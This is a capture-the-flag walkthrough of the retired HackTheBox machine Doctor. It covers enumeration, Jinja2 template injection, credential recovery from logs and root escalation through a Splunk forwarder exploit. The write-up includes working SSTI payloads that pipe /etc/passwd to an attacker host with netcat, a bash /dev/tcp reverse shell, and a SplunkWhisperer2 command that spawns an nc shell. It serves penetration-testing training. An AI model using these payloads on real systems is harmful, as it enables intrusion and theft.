HTB Walkthrough: Doctor w/o Metasploit (retired)

4 min readJun 1, 2021

Doctor is a retired box on HTB and is part of TJ Null’s OCSP-like boxes.

Hostname: Doctor | Difficulty Level: Easy | Operating System: Linux

Nmap Scan

# Nmap 7.91 scan initiated Thu May 27 10:45:26 2021 as:
nmap -sC -sV -oA Doctor 10.10.10.209
Nmap scan report for 10.10.10.209
Host is up (0.024s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
| 256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_ 256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020–09–06T15:57:27
|_Not valid after: 2023–09–06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

Browsing to http://10.10.10.209/ reveals email ‘info@doctors.htb’. Let’s save ‘doctors.htb’ in /etc/hosts. Browsing to ‘http://doctors.htb/’ reveals a login page. Viewing source code for login page reveals presence of ‘/Archive’ directory. Browsing this reveals a blank page but when you right click the page, it is an XML document.

<! — archive still under beta testing<a class=”nav-item nav-link” href=”/archive”>Archive</a> →

Creating a user in the login page.

Creating a new message in portal and seeing if it has effects on http://doctors.htb/archive page and we can see title of the message displayed. This hints that the portal maybe vulnerable to SSTI. Refer this link for more info: https://portswigger.net/research/server-side-template-injection

Exploitation

(a) Confirm if SSTI is vulnerable with input: ${7*7}
(b) Check the SSTI type with input: {{7*7}}
(c) Confirming the type to be Jinja2: {{7*’7'}}

Searching for ‘jinja2 exploit’: https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/

(d) Display /etc/password file with input: {% if request[‘application’]

[‘__globals__’][‘__builtins__’][‘__import__’](‘os’)[‘popen’](‘cat /etc/passwd | nc <Kali IP> 1337’)[‘read’]() == ‘chiv’ %} a {% endif %}

(e) Getting a reverse shell:

{% if request[‘application’][‘__globals__’][‘__builtins__’][‘__import__’](‘os’)[‘popen’](‘bash -c “bash -i >& /dev/tcp/<Kali IP>/9876 0>&1”’)[‘read’]() == ‘chiv’ %} a {% endif %}

Open a netcat session in kali on port 9876 and you will get a reverse shell.

web@doctor:~$ pwd
pwd
/home/web

Escalation to user ‘shaun’:

We need to escalate our privileges to user ‘shaun’ for user flag.

web@doctor:/home$ ls -la
drwxr-xr-x 6 shaun shaun 4096 Sep 15 2020 shaun
drwxr-xr-x 6 web web 4096 Sep 28 2020 web

Looking for password in log file:

web@doctor:/dev/shm$ grep -R “password” /var/log/ >> /dev/shm/out.txt

Interesting entry
/var/log/syslog.1:May 29 17:28:58 doctor kernel: [ 5.141606] systemd[1]: Started Forward Password Requests to Plymouth Directory Watch.
/var/log/apache2/backup:10.10.14.4 — — [05/Sep/2020:11:17:34 +2000] “POST /reset_password?email=Guitar123” 500 453 “http://doctor.htb/reset_password"

Instead of email, it looks like the user must have entered password in the email field. Let us check if the password works for user ‘shaun’ and we get a shell + user flag.

Privilege Escalation

Looking for services to exploit. Nmap scan hinted on splunk being open. It is running with root privileges.

shaun@doctor:/$ ps -aux | grep splunk
ps -aux | grep splunk
root 1140 0.0 2.1 257468 86488 ? Sl 17:29 0:07 splunkd -p 8089 start
root 1142 0.0 0.3 77664 13484 ? Ss 17:29 0:00 [splunkd pid=1140] splunkd -p 8089 start [process-runner]
shaun 2656 0.0 0.0 17668 728 pts/2 S+ 20:37 0:00 grep — color=auto splunk

When you google search for “splunk port 8089”, you will know that it is running splunk forwarder service. Google search for ‘splunk forwarder exploit’ and you will come across this exploit: https://github.com/cnotin/SplunkWhisperer2. Running the exploit and opening a netcat shell in another kali tab.

┌──(root💀kali)-[/home/kali/labs/HTB/Doctor]
└─# python3 PySplunkWhisperer2_remote.py — host 10.10.10.209 — port 8089 — lhost <Kali IP> — username shaun — password Guitar123 — payload “/bin/nc -e /bin/bash <Kali IP> 9877”
Running in remote mode (Remote Code Execution)
[.] Authenticating…
[+] Authenticated
[.] Creating malicious app bundle…
[+] Created malicious app bundle in: /tmp/tmpe_puwxqd.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://<Kali IP>:8181/
10.10.10.209 — — [29/May/2021 14:53:09] “GET / HTTP/1.1” 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup

And you will get root shell + flag.